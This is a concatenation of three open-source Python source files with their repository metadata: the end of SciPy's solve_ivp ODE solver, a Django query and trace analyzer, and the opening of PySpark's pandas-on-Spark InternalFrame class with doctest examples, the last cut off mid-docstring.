lband, uband : int or None, optional
Parameters defining the bandwidth of the Jacobian for the 'LSODA'
method, i.e., ``jac[i, j] != 0 only for i - lband <= j <= i + uband``.
Default is None. Setting these requires your jac routine to return the
Jacobian in the packed format: the returned array must have ``n``
columns and ``uband + lband + 1`` rows in which Jacobian diagonals are
written. Specifically ``jac_packed[uband + i - j , j] = jac[i, j]``.
The same format is used in `scipy.linalg.solve_banded` (check for an
illustration). These parameters can be also used with ``jac=None`` to
reduce the number of Jacobian elements estimated by finite differences.
min_step : float, optional
The minimum allowed step size for 'LSODA' method.
By default `min_step` is zero.
Returns
-------
Bunch object with the following fields defined:
t : ndarray, shape (n_points,)
Time points.
y : ndarray, shape (n, n_points)
Values of the solution at `t`.
sol : `OdeSolution` or None
Found solution as `OdeSolution` instance; None if `dense_output` was
set to False.
t_events : list of ndarray or None
Contains for each event type a list of arrays at which an event of
that type event was detected. None if `events` was None.
y_events : list of ndarray or None
For each value of `t_events`, the corresponding value of the solution.
None if `events` was None.
nfev : int
Number of evaluations of the right-hand side.
njev : int
Number of evaluations of the Jacobian.
nlu : int
Number of LU decompositions.
status : int
Reason for algorithm termination:
* -1: Integration step failed.
* 0: The solver successfully reached the end of `tspan`.
* 1: A termination event occurred.
message : string
Human-readable description of the termination reason.
success : bool
True if the solver reached the interval end or a termination event
occurred (``status >= 0``).
References
----------
.. [1] J. R. Dormand, P. J. Prince, "A family of embedded Runge-Kutta
formulae", Journal of Computational and Applied Mathematics, Vol. 6,
No. 1, pp. 19-26, 1980.
.. [2] L. W. Shampine, "Some Practical Runge-Kutta Formulas", Mathematics
of Computation,, Vol. 46, No. 173, pp. 135-150, 1986.
.. [3] P. Bogacki, L.F. Shampine, "A 3(2) Pair of Runge-Kutta Formulas",
Appl. Math. Lett. Vol. 2, No. 4. pp. 321-325, 1989.
.. [4] E. Hairer, G. Wanner, "Solving Ordinary Differential Equations II:
Stiff and Differential-Algebraic Problems", Sec. IV.8.
.. [5] `Backward Differentiation Formula
<https://en.wikipedia.org/wiki/Backward_differentiation_formula>`_
on Wikipedia.
.. [6] L. F. Shampine, M. W. Reichelt, "THE MATLAB ODE SUITE", SIAM J. SCI.
COMPUTE., Vol. 18, No. 1, pp. 1-22, January 1997.
.. [7] A. C. Hindmarsh, "ODEPACK, A Systematized Collection of ODE
Solvers," IMACS Transactions on Scientific Computation, Vol 1.,
pp. 55-64, 1983.
.. [8] L. Petzold, "Automatic selection of methods for solving stiff and
nonstiff systems of ordinary differential equations", SIAM Journal
on Scientific and Statistical Computing, Vol. 4, No. 1, pp. 136-148,
1983.
.. [9] `Stiff equation <https://en.wikipedia.org/wiki/Stiff_equation>`_ on
Wikipedia.
.. [10] A. Curtis, M. J. D. Powell, and J. Reid, "On the estimation of
sparse Jacobian matrices", Journal of the Institute of Mathematics
and its Applications, 13, pp. 117-120, 1974.
.. [11] `Cauchy-Riemann equations
<https://en.wikipedia.org/wiki/Cauchy-Riemann_equations>`_ on
Wikipedia.
.. [12] `Lotka-Volterra equations
<https://en.wikipedia.org/wiki/Lotka%E2%80%93Volterra_equations>`_
on Wikipedia.
.. [13] E. Hairer, S. P. Norsett G. Wanner, "Solving Ordinary Differential
Equations I: Nonstiff Problems", Sec. II.
.. [14] `Page with original Fortran code of DOP853
<http://www.unige.ch/~hairer/software.html>`_.
Examples
--------
Basic exponential decay showing automatically chosen time points.
>>> from scipy.integrate import solve_ivp
>>> def exponential_decay(t, y): return -0.5 * y
>>> sol = solve_ivp(exponential_decay, [0, 10], [2, 4, 8])
>>> print(sol.t)
[ 0. 0.11487653 1.26364188 3.06061781 4.81611105 6.57445806
8.33328988 10. ]
>>> print(sol.y)
[[2. 1.88836035 1.06327177 0.43319312 0.18017253 0.07483045
0.03107158 0.01350781]
[4. 3.7767207 2.12654355 0.86638624 0.36034507 0.14966091
0.06214316 0.02701561]
[8. 7.5534414 4.25308709 1.73277247 0.72069014 0.29932181
0.12428631 0.05403123]]
Specifying points where the solution is desired.
>>> sol = solve_ivp(exponential_decay, [0, 10], [2, 4, 8],
... t_eval=[0, 1, 2, 4, 10])
>>> print(sol.t)
[ 0 1 2 4 10]
>>> print(sol.y)
[[2. 1.21305369 0.73534021 0.27066736 0.01350938]
[4. 2.42610739 1.47068043 0.54133472 0.02701876]
[8. 4.85221478 2.94136085 1.08266944 0.05403753]]
Cannon fired upward with terminal event upon impact. The ``terminal`` and
``direction`` fields of an event are applied by monkey patching a function.
Here ``y[0]`` is position and ``y[1]`` is velocity. The projectile starts
at position 0 with velocity +10. Note that the integration never reaches
t=100 because the event is terminal.
>>> def upward_cannon(t, y): return [y[1], -0.5]
>>> def hit_ground(t, y): return y[0]
>>> hit_ground.terminal = True
>>> hit_ground.direction = -1
>>> sol = solve_ivp(upward_cannon, [0, 100], [0, 10], events=hit_ground)
>>> print(sol.t_events)
[array([40.])]
>>> print(sol.t)
[0.00000000e+00 9.99900010e-05 1.09989001e-03 1.10988901e-02
1.11088891e-01 1.11098890e+00 1.11099890e+01 4.00000000e+01]
Use `dense_output` and `events` to find position, which is 100, at the apex
of the cannonball's trajectory. Apex is not defined as terminal, so both
apex and hit_ground are found. There is no information at t=20, so the sol
attribute is used to evaluate the solution. The sol attribute is returned
by setting ``dense_output=True``. Alternatively, the `y_events` attribute
can be used to access the solution at the time of the event.
>>> def apex(t, y): return y[1]
>>> sol = solve_ivp(upward_cannon, [0, 100], [0, 10],
... events=(hit_ground, apex), dense_output=True)
>>> print(sol.t_events)
[array([40.]), array([20.])]
>>> print(sol.t)
[0.00000000e+00 9.99900010e-05 1.09989001e-03 1.10988901e-02
1.11088891e-01 1.11098890e+00 1.11099890e+01 4.00000000e+01]
>>> print(sol.sol(sol.t_events[1][0]))
[100. 0.]
>>> print(sol.y_events)
[array([[-5.68434189e-14, -1.00000000e+01]]), array([[1.00000000e+02, 1.77635684e-15]])]
As an example of a system with additional parameters, we'll implement
the Lotka-Volterra equations [12]_.
>>> def lotkavolterra(t, z, a, b, c, d):
... x, y = z
... return [a*x - b*x*y, -c*y + d*x*y]
...
We pass in the parameter values a=1.5, b=1, c=3 and d=1 with the `args`
argument.
>>> sol = solve_ivp(lotkavolterra, [0, 15], [10, 5], args=(1.5, 1, 3, 1),
... dense_output=True)
Compute a dense solution and plot it.
>>> t = np.linspace(0, 15, 300)
>>> z = sol.sol(t)
>>> import matplotlib.pyplot as plt
>>> plt.plot(t, z.T)
>>> plt.xlabel('t')
>>> plt.legend(['x', 'y'], shadow=True)
>>> plt.title('Lotka-Volterra System')
>>> plt.show()
"""
if method not in METHODS and not (
inspect.isclass(method) and issubclass(method, OdeSolver)):
raise ValueError("`method` must be one of {} or OdeSolver class."
.format(METHODS))
t0, tf = map(float, t_span)
if args is not None:
# Wrap the user's fun (and jac, if given) in lambdas to hide the
# additional parameters. Pass in the original fun as a keyword
# argument to keep it in the scope of the lambda.
fun = lambda t, x, fun=fun: fun(t, x, *args)
jac = options.get('jac')
if callable(jac):
options['jac'] = lambda t, x: jac(t, x, *args)
if t_eval is not None:
t_eval = np.asarray(t_eval)
if t_eval.ndim != 1:
raise ValueError("`t_eval` must be 1-dimensional.")
if np.any(t_eval < min(t0, tf)) or np.any(t_eval > max(t0, tf)):
raise ValueError("Values in `t_eval` are not within `t_span`.")
d = np.diff(t_eval)
if tf > t0 and np.any(d <= 0) or tf < t0 and np.any(d >= 0):
raise ValueError("Values in `t_eval` are not properly sorted.")
if tf > t0:
t_eval_i = 0
else:
# Make order of t_eval decreasing to use np.searchsorted.
t_eval = t_eval[::-1]
# This will be an upper bound for slices.
t_eval_i = t_eval.shape[0]
if method in METHODS:
method = METHODS[method]
solver = method(fun, t0, y0, tf, vectorized=vectorized, **options)
if t_eval is None:
ts = [t0]
ys = [y0]
elif t_eval is not None and dense_output:
ts = []
ti = [t0]
ys = []
else:
ts = []
ys = []
interpolants = []
events, is_terminal, event_dir = prepare_events(events)
if events is not None:
if args is not None:
# Wrap user functions in lambdas to hide the additional parameters.
# The original event function is passed as a keyword argument to the
# lambda to keep the original function in scope (i.e., avoid the
# late binding closure "gotcha").
events = [lambda t, x, event=event: event(t, x, *args)
for event in events]
g = [event(t0, y0) for event in events]
t_events = [[] for _ in range(len(events))]
y_events = [[] for _ in range(len(events))]
else:
t_events = None
y_events = None
status = None
while status is None:
message = solver.step()
if solver.status == 'finished':
status = 0
elif solver.status == 'failed':
status = -1
break
t_old = solver.t_old
t = solver.t
y = solver.y
if dense_output:
sol = solver.dense_output()
interpolants.append(sol)
else:
sol = None
if events is not None:
g_new = [event(t, y) for event in events]
active_events = find_active_events(g, g_new, event_dir)
if active_events.size > 0:
if sol is None:
sol = solver.dense_output()
root_indices, roots, terminate = handle_events(
sol, events, active_events, is_terminal, t_old, t)
for e, te in zip(root_indices, roots):
t_events[e].append(te)
y_events[e].append(sol(te))
if terminate:
status = 1
t = roots[-1]
y = sol(t)
g = g_new
if t_eval is None:
ts.append(t)
ys.append(y)
else:
# The value in t_eval equal to t will be included.
if solver.direction > 0:
t_eval_i_new = np.searchsorted(t_eval, t, side='right')
t_eval_step = t_eval[t_eval_i:t_eval_i_new]
else:
t_eval_i_new = np.searchsorted(t_eval, t, side='left')
# It has to be done with two slice operations, because
# you can't slice to 0th element inclusive using backward
# slicing.
t_eval_step = t_eval[t_eval_i_new:t_eval_i][::-1]
if t_eval_step.size > 0:
if sol is None:
sol = solver.dense_output()
ts.append(t_eval_step)
ys.append(sol(t_eval_step))
t_eval_i = t_eval_i_new
if t_eval is not None and dense_output:
ti.append(t)
message = MESSAGES.get(status, message)
if t_events is not None:
t_events = [np.asarray(te) for te in t_events]
y_events = [np.asarray(ye) for ye in y_events]
if t_eval is None:
ts = np.array(ts)
ys = np.vstack(ys).T
elif ts:
ts = np.hstack(ts)
ys = np.hstack(ys)
if dense_output:
if t_eval is None:
sol = OdeSolution(ts, interpolants)
else:
sol = OdeSolution(ti, interpolants)
else:
sol = None
return OdeResult(t=ts, y=ys, sol=sol, t_events=t_events, y_events=y_events,
nfev=solver.nfev, njev=solver.njev, nlu=solver.nlu,
status=status, message=message, success=status >= 0)
| {
"content_hash": "c590bce9c1608acd4503a5eb16127d97",
"timestamp": "",
"source": "github",
"line_count": 663,
"max_line_length": 92,
"avg_line_length": 41.542986425339365,
"alnum_prop": 0.6049813019642014,
"repo_name": "matthew-brett/scipy",
"id": "79c65414fbd649c3a2bda47faa8a5279f88ed28a",
"size": "27543",
"binary": false,
"copies": "1",
"ref": "refs/heads/polished-meson-windows",
"path": "scipy/integrate/_ivp/ivp.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "4818671"
},
{
"name": "C++",
"bytes": "3181034"
},
{
"name": "CMake",
"bytes": "29273"
},
{
"name": "Cython",
"bytes": "1035101"
},
{
"name": "Dockerfile",
"bytes": "9777"
},
{
"name": "Fortran",
"bytes": "5298461"
},
{
"name": "MATLAB",
"bytes": "4346"
},
{
"name": "Makefile",
"bytes": "778"
},
{
"name": "Meson",
"bytes": "133294"
},
{
"name": "PowerShell",
"bytes": "1554"
},
{
"name": "Python",
"bytes": "14259543"
},
{
"name": "Shell",
"bytes": "4415"
},
{
"name": "TeX",
"bytes": "52106"
}
],
"symlink_target": ""
} |
from collections import defaultdict
from snoopy.helpers import get_app_root, default_json_serializer
from snoopy.trace import Trace
import datetime
import json
import re
DJANGO_DB_QUERY_FILE = "django/db/models/query.py"
class TraceAnalyzer(object):
def __init__(self, data):
self.trace_data = data
self.trace = None
self.query_info = {}
self.profiler_info = {}
self.app_root = get_app_root()
def process_builtin_profiler_result(self):
self.profiler_info['total_traces'] = len(self.trace_data['profiler_traces'])
if self.profiler_info['total_traces'] == 0:
return
# Because it contains both call/return events
self.profiler_info['total_traces'] /= 2
def summarize_profiler_result(self):
print json.dumps(self.trace, indent=4, default=default_json_serializer)
def process_traceback_line(self, line):
parts = line.strip().split(' ')
return {
"file_name": parts[1].split('"')[1],
"function_name": parts[5].strip(),
"line_number": parts[3].split(",")[0],
"line": " ".join(parts[6:]).strip()
}
def process_query(self, query):
query_data = {
'model': query['model'],
'total_query_time': query['total_query_time'],
'query_type': 'read'
}
previous_line = ""
best_non_app_code_line = ""
best_app_code_line = ""
for line in reversed(query['traceback']):
if DJANGO_DB_QUERY_FILE in previous_line and not DJANGO_DB_QUERY_FILE in line:
best_non_app_code_line = self.process_traceback_line(line)
if self.app_root in line:
best_app_code_line = self.process_traceback_line(line)
break
previous_line = line
if best_app_code_line != "":
best_line = best_app_code_line
else:
best_line = best_non_app_code_line
query_data['code'] = best_line
return query_data
def process_queries(self):
self.query_info['total_queries'] = len(self.trace_data['queries'])
if self.query_info['total_queries'] == 0:
return
self.query_info['stats'] = {
'query_type': defaultdict(int),
'model': {},
}
self.query_info['total_time_on_queries'] = 0.0
for query in self.trace_data['queries']:
query_data = self.process_query(query)
if not query_data:
continue
self.query_info['stats']['query_type'][query_data['query_type']] += 1
if query_data['model'] not in self.query_info['stats']['model']:
new_model_info = {
'query_type': {
query_data['query_type'] : {
'count': 0,
'total_query_time': 0.0,
'max_query_time': 0.0,
'max_query_time_code': None
}
},
'total_query_count': 0
}
self.query_info['stats']['model'][query_data['model']] = new_model_info
model_info = self.query_info['stats']['model'][query_data['model']]
model_info['total_query_count'] += 1
model_query_type_info = model_info['query_type'][query_data['query_type']]
model_query_type_info['count'] += 1
model_query_type_info['total_query_time'] += query_data['total_query_time']
if model_query_type_info['max_query_time'] < query_data['total_query_time']:
model_query_type_info['max_query_time'] = query_data['total_query_time']
model_query_type_info['max_query_time_code'] = query_data['code']
self.query_info['total_time_on_queries'] += query_data['total_query_time']
def summarize_queries(self):
if self.query_info['total_queries'] == 0:
return
print "Total SQL Queries: %d" % self.query_info['total_queries']
print 'Total time on SQL Queries: %0.4f' % self.query_info['total_time_on_queries']
print 'Stats on SQL Queries:'
print json.dumps(self.query_info['stats'], indent=4)
def summarize(self):
# print "Total Request Time: %0.4f" % self.trace_data['total_request_time']
# print "URL: " + self.trace_data['request']
# self.summarize_queries()
self.summarize_profiler_result()
pass
def analyze(self):
self.process_queries()
self.process_builtin_profiler_result()
self.trace = Trace(self.trace_data['profiler_traces'], self.trace_data['queries'])
# TODO: Do the cProfiler processing as well
self.summarize()
| {
"content_hash": "f74aef988189e43c44eb4c25891d0993",
"timestamp": "",
"source": "github",
"line_count": 141,
"max_line_length": 91,
"avg_line_length": 34.36879432624114,
"alnum_prop": 0.5489063144861742,
"repo_name": "Pradeek/django-snoopy",
"id": "cb8b31619a758adb35f1341a2d04d9828c375a0e",
"size": "4846",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "snoopy/trace_analyzer.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "25709"
}
],
"symlink_target": ""
} |
"""
An internal immutable DataFrame with some metadata to manage indexes.
"""
import re
from typing import Any, Dict, List, Optional, Sequence, Tuple, Union, TYPE_CHECKING, cast
import numpy as np
import pandas as pd
from pandas.api.types import CategoricalDtype # noqa: F401
from pyspark._globals import _NoValue, _NoValueType
from pyspark.sql import functions as F, Column, DataFrame as SparkDataFrame, Window
from pyspark.sql.types import ( # noqa: F401
BooleanType,
DataType,
IntegralType,
LongType,
StructField,
StructType,
StringType,
)
# For running doctests and reference resolution in PyCharm.
from pyspark import pandas as ps
from pyspark.pandas._typing import Label
if TYPE_CHECKING:
# This is required in old Python 3.5 to prevent circular reference.
from pyspark.pandas.series import Series # noqa: F401 (SPARK-34943)
from pyspark.pandas.spark.utils import as_nullable_spark_type, force_decimal_precision_scale
from pyspark.pandas.data_type_ops.base import DataTypeOps
from pyspark.pandas.typedef import (
Dtype,
as_spark_type,
extension_dtypes,
infer_pd_series_spark_type,
spark_type_to_pandas_dtype,
)
from pyspark.pandas.utils import (
column_labels_level,
default_session,
is_name_like_tuple,
is_testing,
lazy_property,
name_like_string,
scol_for,
spark_column_equals,
)
# A function to turn given numbers to Spark columns that represent pandas-on-Spark index.
SPARK_INDEX_NAME_FORMAT = "__index_level_{}__".format
SPARK_DEFAULT_INDEX_NAME = SPARK_INDEX_NAME_FORMAT(0)
# A pattern to check if the name of a Spark column is a pandas-on-Spark index name or not.
SPARK_INDEX_NAME_PATTERN = re.compile(r"__index_level_[0-9]+__")
NATURAL_ORDER_COLUMN_NAME = "__natural_order__"
HIDDEN_COLUMNS = {NATURAL_ORDER_COLUMN_NAME}
DEFAULT_SERIES_NAME = 0
SPARK_DEFAULT_SERIES_NAME = str(DEFAULT_SERIES_NAME)
class InternalField:
"""
The internal field to store the dtype as well as the Spark's StructField optionally.
Parameters
----------
dtype : numpy.dtype or pandas' ExtensionDtype
The dtype for the field
struct_field : StructField, optional
The `StructField` for the field. If None, InternalFrame will properly set.
"""
def __init__(self, dtype: Dtype, struct_field: Optional[StructField] = None):
self._dtype = dtype
self._struct_field = struct_field
@staticmethod
def from_struct_field(
struct_field: StructField, *, use_extension_dtypes: bool = False
) -> "InternalField":
"""
Returns a new InternalField object created from the given StructField.
The dtype will be inferred from the data type of the given StructField.
Parameters
----------
struct_field : StructField
The StructField used to create a new InternalField object.
use_extension_dtypes : bool
If True, try to use the extension dtypes.
Returns
-------
InternalField
"""
return InternalField(
dtype=spark_type_to_pandas_dtype(
struct_field.dataType, use_extension_dtypes=use_extension_dtypes
),
struct_field=struct_field,
)
@property
def dtype(self) -> Dtype:
"""Return the dtype for the field."""
return self._dtype
@property
def struct_field(self) -> Optional[StructField]:
"""Return the StructField for the field."""
return self._struct_field
@property
def name(self) -> str:
"""Return the field name if the StructField exists."""
assert self.struct_field is not None
return self.struct_field.name
@property
def spark_type(self) -> DataType:
"""Return the spark data type for the field if the StructField exists."""
assert self.struct_field is not None
return self.struct_field.dataType
@property
def nullable(self) -> bool:
"""Return the nullability for the field if the StructField exists."""
assert self.struct_field is not None
return self.struct_field.nullable
@property
def metadata(self) -> Dict[str, Any]:
"""Return the metadata for the field if the StructField exists."""
assert self.struct_field is not None
return self.struct_field.metadata
@property
def is_extension_dtype(self) -> bool:
"""Return whether the dtype for the field is an extension type or not."""
return isinstance(self.dtype, extension_dtypes)
def normalize_spark_type(self) -> "InternalField":
"""Return a new InternalField object with normalized Spark data type."""
assert self.struct_field is not None
return self.copy(
spark_type=force_decimal_precision_scale(as_nullable_spark_type(self.spark_type)),
nullable=True,
)
def copy(
self,
*,
name: Union[str, _NoValueType] = _NoValue,
dtype: Union[Dtype, _NoValueType] = _NoValue,
spark_type: Union[DataType, _NoValueType] = _NoValue,
nullable: Union[bool, _NoValueType] = _NoValue,
metadata: Union[Optional[Dict[str, Any]], _NoValueType] = _NoValue,
) -> "InternalField":
"""Copy the InternalField object."""
if name is _NoValue:
name = self.name
if dtype is _NoValue:
dtype = self.dtype
if spark_type is _NoValue:
spark_type = self.spark_type
if nullable is _NoValue:
nullable = self.nullable
if metadata is _NoValue:
metadata = self.metadata
return InternalField(
dtype=cast(Dtype, dtype),
struct_field=StructField(
name=cast(str, name),
dataType=cast(DataType, spark_type),
nullable=cast(bool, nullable),
metadata=cast(Optional[Dict[str, Any]], metadata),
),
)
def __eq__(self, other: Any) -> bool:
return (
isinstance(other, InternalField)
and self.dtype == other.dtype
and self.struct_field == other.struct_field
)
def __repr__(self) -> str:
return "InternalField(dtype={dtype},struct_field={struct_field})".format(
dtype=self.dtype, struct_field=self.struct_field
)
class InternalFrame(object):
"""
The internal immutable DataFrame which manages Spark DataFrame and column names and index
information.
.. note:: this is an internal class. It is not supposed to be exposed to users and users
should not directly access to it.
The internal immutable DataFrame represents the index information for a DataFrame it belongs to.
For instance, if we have a pandas-on-Spark DataFrame as below, pandas DataFrame does not
store the index as columns.
>>> psdf = ps.DataFrame({
... 'A': [1, 2, 3, 4],
... 'B': [5, 6, 7, 8],
... 'C': [9, 10, 11, 12],
... 'D': [13, 14, 15, 16],
... 'E': [17, 18, 19, 20]}, columns = ['A', 'B', 'C', 'D', 'E'])
>>> psdf # doctest: +NORMALIZE_WHITESPACE
A B C D E
0 1 5 9 13 17
1 2 6 10 14 18
2 3 7 11 15 19
3 4 8 12 16 20
However, all columns including index column are also stored in Spark DataFrame internally
as below.
>>> psdf._internal.to_internal_spark_frame.show() # doctest: +NORMALIZE_WHITESPACE
+-----------------+---+---+---+---+---+
|__index_level_0__| A| B| C| D| E|
+-----------------+---+---+---+---+---+
| 0| 1| 5| 9| 13| 17|
| 1| 2| 6| 10| 14| 18|
| 2| 3| 7| 11| 15| 19|
| 3| 4| 8| 12| 16| 20|
+-----------------+---+---+---+---+---+
In order to fill this gap, the current metadata is used by mapping Spark's internal column
to pandas-on-Spark's index. See the method below:
* `spark_frame` represents the internal Spark DataFrame
* `data_spark_column_names` represents non-indexing Spark column names
* `data_spark_columns` represents non-indexing Spark columns
* `data_fields` represents non-indexing InternalFields
* `index_spark_column_names` represents internal index Spark column names
* `index_spark_columns` represents internal index Spark columns
* `index_fields` represents index InternalFields
* `spark_column_names` represents all columns
* `index_names` represents the external index name as a label
* `to_internal_spark_frame` represents Spark DataFrame derived by the metadata. Includes index.
* `to_pandas_frame` represents pandas DataFrame derived by the metadata
>>> internal = psdf._internal
>>> internal.spark_frame.show() # doctest: +NORMALIZE_WHITESPACE +ELLIPSIS
+-----------------+---+---+---+---+---+-----------------+
|__index_level_0__| A| B| C| D| E|__natural_order__|
+-----------------+---+---+---+---+---+-----------------+
| 0| 1| 5| 9| 13| 17| ...|
| 1| 2| 6| 10| 14| 18| ...|
| 2| 3| 7| 11| 15| 19| ...|
| 3| 4| 8| 12| 16| 20| ...|
+-----------------+---+---+---+---+---+-----------------+
>>> internal.data_spark_column_names
['A', 'B', 'C', 'D', 'E']
>>> internal.index_spark_column_names
['__index_level_0__']
>>> internal.spark_column_names
['__index_level_0__', 'A', 'B', 'C', 'D', 'E']
>>> internal.index_names
[None]
>>> internal.data_fields # doctest: +NORMALIZE_WHITESPACE
[InternalField(dtype=int64,struct_field=StructField(A,LongType,false)),
InternalField(dtype=int64,struct_field=StructField(B,LongType,false)),
InternalField(dtype=int64,struct_field=StructField(C,LongType,false)),
InternalField(dtype=int64,struct_field=StructField(D,LongType,false)),
InternalField(dtype=int64,struct_field=StructField(E,LongType,false))]
>>> internal.index_fields
[InternalField(dtype=int64,struct_field=StructField(__index_level_0__,LongType,false))]
>>> internal.to_internal_spark_frame.show() # doctest: +NORMALIZE_WHITESPACE
+-----------------+---+---+---+---+---+
|__index_level_0__| A| B| C| D| E|
+-----------------+---+---+---+---+---+
| 0| 1| 5| 9| 13| 17|
| 1| 2| 6| 10| 14| 18|
| 2| 3| 7| 11| 15| 19|
| 3| 4| 8| 12| 16| 20|
+-----------------+---+---+---+---+---+
>>> internal.to_pandas_frame
A B C D E
0 1 5 9 13 17
1 2 6 10 14 18
2 3 7 11 15 19
3 4 8 12 16 20
In case that index is set to one of the existing column as below:
>>> psdf1 = psdf.set_index("A")
>>> psdf1 # doctest: +NORMALIZE_WHITESPACE
B C D E
A
1 5 9 13 17
2 6 10 14 18
3 7 11 15 19
4 8 12 16 20
>>> psdf1._internal.to_internal_spark_frame.show() # doctest: +NORMALIZE_WHITESPACE
+---+---+---+---+---+
| A| B| C| D| E|
+---+---+---+---+---+
| 1| 5| 9| 13| 17|
| 2| 6| 10| 14| 18|
| 3| 7| 11| 15| 19|
| 4| 8| 12| 16| 20|
+---+---+---+---+---+
>>> internal = psdf1._internal
>>> internal.spark_frame.show() # doctest: +NORMALIZE_WHITESPACE +ELLIPSIS
+-----------------+---+---+---+---+---+-----------------+
|__index_level_0__| A| B| C| D| E|__natural_order__|
+-----------------+---+---+---+---+---+-----------------+
| 0| 1| 5| 9| 13| 17| ...|
| 1| 2| 6| 10| 14| 18| ...|
| 2| 3| 7| 11| 15| 19| ...|
| 3| 4| 8| 12| 16| 20| ...|
+-----------------+---+---+---+---+---+-----------------+
>>> internal.data_spark_column_names
['B', 'C', 'D', 'E']
>>> internal.index_spark_column_names
['A']
>>> internal.spark_column_names
['A', 'B', 'C', 'D', 'E']
>>> internal.index_names
[('A',)]
>>> internal.data_fields
[InternalField(dtype=int64,struct_field=StructField(B,LongType,false)),
InternalField(dtype=int64,struct_field=StructField(C,LongType,false)),
InternalField(dtype=int64,struct_field=StructField(D,LongType,false)),
InternalField(dtype=int64,struct_field=StructField(E,LongType,false))]
>>> internal.index_fields
[InternalField(dtype=int64,struct_field=StructField(A,LongType,false))]
>>> internal.to_internal_spark_frame.show() # doctest: +NORMALIZE_WHITESPACE
+---+---+---+---+---+
| A| B| C| D| E|
+---+---+---+---+---+
| 1| 5| 9| 13| 17|
| 2| 6| 10| 14| 18|
| 3| 7| 11| 15| 19|
| 4| 8| 12| 16| 20|
+---+---+---+---+---+
>>> internal.to_pandas_frame # doctest: +NORMALIZE_WHITESPACE
B C D E
A
1 5 9 13 17
2 6 10 14 18
3 7 11 15 19
4 8 12 16 20
In case that index becomes a multi index as below:
>>> psdf2 = psdf.set_index("A", append=True)
>>> psdf2 # doctest: +NORMALIZE_WHITESPACE
B C D E
A
0 1 5 9 13 17
1 2 6 10 14 18
2 3 7 11 15 19
3 4 8 12 16 20
>>> psdf2._internal.to_internal_spark_frame.show() # doctest: +NORMALIZE_WHITESPACE
+-----------------+---+---+---+---+---+
|__index_level_0__| A| B| C| D| E|
+-----------------+---+---+---+---+---+
| 0| 1| 5| 9| 13| 17|
| 1| 2| 6| 10| 14| 18|
| 2| 3| 7| 11| 15| 19|
| 3| 4| 8| 12| 16| 20|
+-----------------+---+---+---+---+---+
>>> internal = psdf2._internal
>>> internal.spark_frame.show() # doctest: +NORMALIZE_WHITESPACE +ELLIPSIS
+-----------------+---+---+---+---+---+-----------------+
|__index_level_0__| A| B| C| D| E|__natural_order__|
+-----------------+---+---+---+---+---+-----------------+
| 0| 1| 5| 9| 13| 17| ...|
| 1| 2| 6| 10| 14| 18| ...|
| 2| 3| 7| 11| 15| 19| ...|
| 3| 4| 8| 12| 16| 20| ...|
+-----------------+---+---+---+---+---+-----------------+
>>> internal.data_spark_column_names
['B', 'C', 'D', 'E']
>>> internal.index_spark_column_names
['__index_level_0__', 'A']
>>> internal.spark_column_names
['__index_level_0__', 'A', 'B', 'C', 'D', 'E']
>>> internal.index_names
[None, ('A',)]
>>> internal.data_fields # doctest: +NORMALIZE_WHITESPACE
[InternalField(dtype=int64,struct_field=StructField(B,LongType,false)),
InternalField(dtype=int64,struct_field=StructField(C,LongType,false)),
InternalField(dtype=int64,struct_field=StructField(D,LongType,false)),
InternalField(dtype=int64,struct_field=StructField(E,LongType,false))]
>>> internal.index_fields # doctest: +NORMALIZE_WHITESPACE
[InternalField(dtype=int64,struct_field=StructField(__index_level_0__,LongType,false)),
InternalField(dtype=int64,struct_field=StructField(A,LongType,false))]
>>> internal.to_internal_spark_frame.show() # doctest: +NORMALIZE_WHITESPACE
+-----------------+---+---+---+---+---+
|__index_level_0__| A| B| C| D| E|
+-----------------+---+---+---+---+---+
| 0| 1| 5| 9| 13| 17|
| 1| 2| 6| 10| 14| 18|
| 2| 3| 7| 11| 15| 19|
| 3| 4| 8| 12| 16| 20|
+-----------------+---+---+---+---+---+
>>> internal.to_pandas_frame # doctest: +NORMALIZE_WHITESPACE
B C D E
A
0 1 5 9 13 17
1 2 6 10 14 18
2 3 7 11 15 19
3 4 8 12 16 20
For multi-level columns, it also holds column_labels
>>> columns = pd.MultiIndex.from_tuples([('X', 'A'), ('X', 'B'),
... ('Y', 'C'), ('Y', 'D')])
>>> psdf3 = ps.DataFrame([
... [1, 2, 3, 4],
... [5, 6, 7, 8],
... [9, 10, 11, 12],
... [13, 14, 15, 16],
... [17, 18, 19, 20]], columns = columns)
>>> psdf3 # doctest: +NORMALIZE_WHITESPACE
X Y
A B C D
0 1 2 3 4
1 5 6 7 8
2 9 10 11 12
3 13 14 15 16
4 17 18 19 20
>>> internal = psdf3._internal
>>> internal.spark_frame.show() # doctest: +NORMALIZE_WHITESPACE +ELLIPSIS
+-----------------+------+------+------+------+-----------------+
|__index_level_0__|(X, A)|(X, B)|(Y, C)|(Y, D)|__natural_order__|
+-----------------+------+------+------+------+-----------------+
| 0| 1| 2| 3| 4| ...|
| 1| 5| 6| 7| 8| ...|
| 2| 9| 10| 11| 12| ...|
| 3| 13| 14| 15| 16| ...|
| 4| 17| 18| 19| 20| ...|
+-----------------+------+------+------+------+-----------------+
>>> internal.data_spark_column_names
['(X, A)', '(X, B)', '(Y, C)', '(Y, D)']
>>> internal.column_labels
[('X', 'A'), ('X', 'B'), ('Y', 'C'), ('Y', 'D')]
For Series, it also holds scol to represent the column.
>>> psseries = psdf1.B
>>> psseries
A
1 5
2 6
3 7
4 8
Name: B, dtype: int64
>>> internal = psseries._internal
>>> internal.spark_frame.show() # doctest: +NORMALIZE_WHITESPACE +ELLIPSIS
+-----------------+---+---+---+---+---+-----------------+
|__index_level_0__| A| B| C| D| E|__natural_order__|
+-----------------+---+---+---+---+---+-----------------+
| 0| 1| 5| 9| 13| 17| ...|
| 1| 2| 6| 10| 14| 18| ...|
| 2| 3| 7| 11| 15| 19| ...|
| 3| 4| 8| 12| 16| 20| ...|
+-----------------+---+---+---+---+---+-----------------+
>>> internal.data_spark_column_names
['B']
>>> internal.index_spark_column_names
['A']
>>> internal.spark_column_names
['A', 'B']
>>> internal.index_names
[('A',)]
>>> internal.data_fields
[InternalField(dtype=int64,struct_field=StructField(B,LongType,false))]
>>> internal.index_fields
[InternalField(dtype=int64,struct_field=StructField(A,LongType,false))]
>>> internal.to_internal_spark_frame.show() # doctest: +NORMALIZE_WHITESPACE
+---+---+
| A| B|
+---+---+
| 1| 5|
| 2| 6|
| 3| 7|
| 4| 8|
+---+---+
